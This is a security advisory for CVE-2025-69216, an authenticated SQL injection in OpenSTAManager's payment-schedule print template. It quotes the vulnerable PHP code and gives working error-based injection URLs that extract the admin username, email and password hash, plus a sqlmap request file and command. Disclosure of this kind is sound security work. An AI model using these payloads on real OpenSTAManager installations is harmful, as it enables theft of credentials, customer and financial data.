CVE-2025-69216
OpenSTAManager has a SQL Injection in Scadenzario Print Template
Description
### Summary An **authenticated SQL Injection vulnerability** in OpenSTAManager's Scadenzario (Payment Schedule) print template allows any authenticated user to extract sensitive data from the database, including admin credentials, customer information, and financial records. The vulnerability enables complete database read access through error-based SQL injection techniques. ### Details The vulnerability exists in `templates/scadenzario/init.php` at **line 46**, where the `id_anagrafica` parameter is directly concatenated into an SQL query without proper sanitization: **Vulnerable Code:** ```php if (get('id_anagrafica') && get('id_anagrafica') != 'null') { $module_query = str_replace('1=1', '1=1 AND `co_scadenziario`.`idanagrafica`="'.get('id_anagrafica').'"', $module_query); $id_anagrafica = get('id_anagrafica'); } ``` The `get()` function retrieves user input from GET/POST parameters without validation. The parameter value is directly embedded into the SQL query string using string concatenation instead of using the application's `prepare()` sanitization function, enabling SQL Injection attacks. **Root Cause:** - Missing use of `prepare()` function for input sanitization - Direct string concatenation in SQL query construction - No input validation or type checking **Affected Endpoint:** ``` /pdfgen.php?ptype=scadenzario&id_anagrafica=[INJECTION_PAYLOAD] ``` **Affected Files:** - `templates/scadenzario/init.php` (line 46) - **Primary vulnerability** - `templates/scadenzario/init.php` (lines 34, 40) - Similar pattern with date parameters - `pdfgen.php` - Entry point for template rendering --- ### PoC (Proof of Concept) #### Prerequisites - Valid authenticated session (any user role) #### Exploitation Steps **1. Confirm Vulnerability - Basic Syntax Error Test:** ```bash http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20--%20 ``` SQL syntax error displayed in application response <img width="2195" height="392" alt="image" src="https://github.com/user-attachments/assets/f62ca7b4-2397-4f90-8698-6cf7f867d102" /> --- **2. Extract Database Version - Error-Based SQLi:** ```bash http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))%20AND%20%221%22=%221 ``` **Result:** `~8.3.0~` (MySQL version) <img width="2061" height="378" alt="image" src="https://github.com/user-attachments/assets/8ea16c47-36cc-4c25-a624-b42ccfcdf52f" /> --- **3. Extract Database Name:** ```bash http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,database(),0x7e))%20AND%20%221%22=%221 ``` **Result:** `~openstamanager~` <img width="1954" height="345" alt="image" src="https://github.com/user-attachments/assets/47479297-5271-4c03-b242-efa513eb28f8" /> --- **4. Extract Admin Username:** ```bash http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20username%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221 ``` **Result:** `~admin~` <img width="1998" height="332" alt="image" src="https://github.com/user-attachments/assets/9f8363cb-8da9-4e8f-8744-ef38c9706be8" /> --- **5. Extract Admin Email:** ```bash http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20email%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221 ``` **Result:** Admin email address <img width="2006" height="339" alt="image" src="https://github.com/user-attachments/assets/4dcd5ea4-4eea-4730-8d39-b8ce2da46e84" /> --- **6. Extract Password Hash (Partial - XPATH 31 char limit):** ```bash http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20password%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221 ``` **Result:** bcrypt password hash <img width="1924" height="328" alt="image" src="https://github.com/user-attachments/assets/27b711f3-9bb6-4909-a5bd-a04177c9f219" /> --- **7. Automated Exploitation with SQLMap:** Create request file `sqli_osm.req`: ```http GET /pdfgen.php?ptype=scadenzario&id_anagrafica=1* HTTP/1.1 Host: localhost:8081 Cookie: PHPSESSID=[SESSION_COOKIE] User-Agent: Mozilla/5.0 ``` Run SQLMap: ```bash sqlmap -r sqli_osm.req --level 3 --risk 3 --dbs ``` **SQLMap Confirmed Injection Types:** - ✅ Boolean-based blind SQL injection - ✅ Error-based SQL injection (MySQL >= 5.6 GTID_SUBSET) - ✅ Time-based blind SQL injection (SLEEP) <img width="1498" height="516" alt="image" src="https://github.com/user-attachments/assets/b733f025-ac4b-4b36-a20e-76d826005f62" /> --- ### Impact **Who is Impacted:** - ✅ **All authenticated users** - Any user with valid credentials can exploit this vulnerability - ✅ **Low-privilege users** - Even users with minimal permissions can access admin-level data - ✅ **All OpenSTAManager installations** - Vulnerability exists in the latest master branch --- ### Attribution Reported by Łukasz Rybak